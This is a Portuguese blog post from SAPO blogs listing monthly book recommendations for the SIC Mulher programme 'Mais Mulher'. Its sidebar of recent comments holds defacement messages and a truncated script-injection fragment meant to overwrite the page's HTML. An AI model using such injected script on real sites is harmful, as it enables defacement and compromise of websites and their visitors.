Na 1ª pessoa @ 18:31

Sex, 22/02/13

Este mês Maria Lopo de Carvalho traz-nos mais uma vez uma selecção literária imperdível!

 

"Livro dos Escoterios" de Marta Reis.


Não há um guião para o que é ser escuteiro, precisamente porque Baden-Powell quis que a magia do Escutismo fosse os adultos não terem receio de deixar brincar as crianças, tornar a brincadeira num espaço de aprendizagem.
A melhor forma de fixar valores e atitudes é pô-las em prática aos 6, aos 10 anos, aos 14 anos na pequena sociedade que é uma patrulha.
Vendo um código de princípios para os escuteiros vertidos na lei e nos princípios resultar quando somos miúdos, e que nos permite ir mais longe, mais alto, mais depressa e melhor, porque haveríamos de fazer diferente em adultos?

"Nas Asas do Amanhã" de Sarah Sundin.


Conseguirão encontrar a coragem de que precisam para enfrentar os seus desafios?
Cheio de drama, coragem e romance, "Nas Asas do Amanhã" encerra de forma magistral a popular série "Asas de Glória".
Rodeados de perigo, irão eles encontrar a coragem para confrontar os seus medos e entregarem-se a um amor duradouro?
"Nas Asas do Amanhã", o terceiro e último livro da série "Asas de Glória" é uma história acerca de como vencer o medo, aceitar a aventura e encontrar e lutar pelo amor.

 

"Escândalos da Monarquia Portuguesa" de Ricardo Raimundo.

                       
Episódios caricatos, rocambolescos, novelescos e escandalosos que não nos são contados nos bancos da escola nem nos livros de história: atentados mal sucedidos, rainhas raptadas, milagres inventados à pressão e muito mais.

"A provocação do Inocente" de Agatha Christie.


Foi originalmente publicada em 1958 no reino unido foi adaptado para o cinema e televisão. Mais um romance policial que se lê de um fôlego.

"O mistério do Infante Santo" de Jorge Sousa Correia.


Os segredos e as intrigas da Ínclita geração a glória e a queda de uma família perfeita, este livro revela o martírio do Infante Santo assente na discórdia dos irmãos unidos por laços de sangue e separados por ambições pessoais, mistérios bem guardados e conspirações políticas.


"Conversas com Pais" de Eva Delgado Martins.


Depois de uma Introdução em que perspectiva a obra no contexto do trabalho do psicólogo como confidente, consultor e instrutor, a autora percorre muitos temas do relacionamento entre pais e filhos. Escrito em linguagem acessível mas onde o rigor da análise nunca está ausente, este livro fornece um conjunto de reflexões que pode ajudar os pais na sua difícil tarefa de educar. Achei particularmente úteis as considerações sobre as mudanças na família, a sexualidade dos adolescentes, a assertividade e o divórcio, mas toda a obra mostra um equilíbrio muito conseguido entre a experiência clínica e a necessidade de fornecer uma abordagem pragmática dos problemas dos pais, que tantas vezes nos perguntam apenas "Que fazer?". Aqui encontrará algumas respostas. Daniel Sampaio


"Educar para o Futuro" de Paul Tough.


Considerado livro do ano pelo New York Times este livro revela as mais recentes descobertas científicas aplicadas à educação e ao desenvolvimento dos nossos filhos. Educar para o futuro anuncia uma mensagem fundamental, o fator decisivo para o futuro das crianças é a formação do seu caracter e nãos as competências cognitivas.


"As 10 questões da recuperação" de João  César das Neves.


A finalidade deste livro é ajudar a esclarecer algumas dúvidas básicas que hoje se colocam aos portugueses, numa linguagem simples, mas sem abandonar o rigor e realismo, clarificar os problemas, serenar os ânimos e contribuir para a solução da crise. Quem tem culpa disto? Devemos sair do euro? Podemos repudiar a dívida? O país aguenta? Quanto tempo dura a crise?

"As primeiras luzes da manhã" de Fabio Volo.

Será que dois infelizes juntos podem encontrar a felicidade? Este é um dos grandes fenómenos literários com mais de 5 milhões de livros vendidos em Itália. Uma relação extra conjugal uma nova vida e, mais importante uma nova forma de ser une Elena ao seu novo amor.

 

Encantada!?!

 

Então não perca o Mais Mulher desta segunda-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 





Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO